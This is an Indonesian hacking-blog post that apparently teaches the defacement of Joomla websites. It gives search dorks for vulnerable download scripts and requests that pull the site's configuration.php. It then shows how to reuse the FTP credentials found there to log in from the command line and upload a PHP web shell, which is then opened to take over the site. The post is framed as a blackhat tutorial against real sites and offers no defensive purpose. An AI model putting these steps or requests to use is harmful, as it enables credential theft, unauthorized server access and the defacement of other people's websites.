» » » Exploit Upload Shell Via FTP CMD (Joomla)

Exploit Upload Shell Via FTP CMD (Joomla)

Oleh
Udah langusng aje yak, mau nulis apa gak tau udah capek mikirin ujian praktikum mennn :(

1. Masukin Dork ke search engine
    Dork :
    inurl:/download.php?file=
    inurl:/force-download.php?file=

2.  Misal udah dapet site target kita,, masukin exploit nya
     Exploit :
     ww.site.com/download.php?file=configuration.php
     ww.site.com/force-download.php?file=configuration.php
3. Kita cari FTP configure nya
    var $Ftp_User : 'user'

    var $Ftp_pass : 'user'
    var $Ftp_root : 'public_html'

4. Buka CMD

5. Step lanjutannya bisa disimak dibawah ini pakde :3
    Example :
  • C:\Documents and Settings\USER> ftp site.com
  • Connected to site.com
    username : user
    331 Password Required for example
    Password : password
    user Loged in 
  • ftp> ls
    public_html ( view var $ftp_root ) --> If var $ftp_root : 'public_html' ( cd public_html )
  • ftp>cd public_html
  • ftp> put "C:\zsn.php" << shell
  • Command Success
    File Transfered
 deface hack joomla retas
6. Nah shell kita udah ke upload,, sekarang cara access nya
    www.site.com/zsn.php

7. Eksekusi dah site nya :3

*NOTE : Maaf blm sempet capture pict demo nya,, besok pasti nyusul,, blm ada waktu yang agak luang lebih buat uwik-uwiknya pakde, yang penting jangan sampe ketinggalan aja pantengin terus di http://zsn-note.blogspot.com


Hack Hacking Hacked retas diretas peretas indonesia ykbh yogyakarta blackhat google yahoo bing gmail ymail live blog blogger blogspot web site shell exploit bug tutorial poc proof of concept joomla upload uploader cara deface defacing ddos ZasieuN
Tag : Defacing, Hacking
0 Komentar untuk "Exploit Upload Shell Via FTP CMD (Joomla)"
Post a Comment

Post a Comment

Back To Top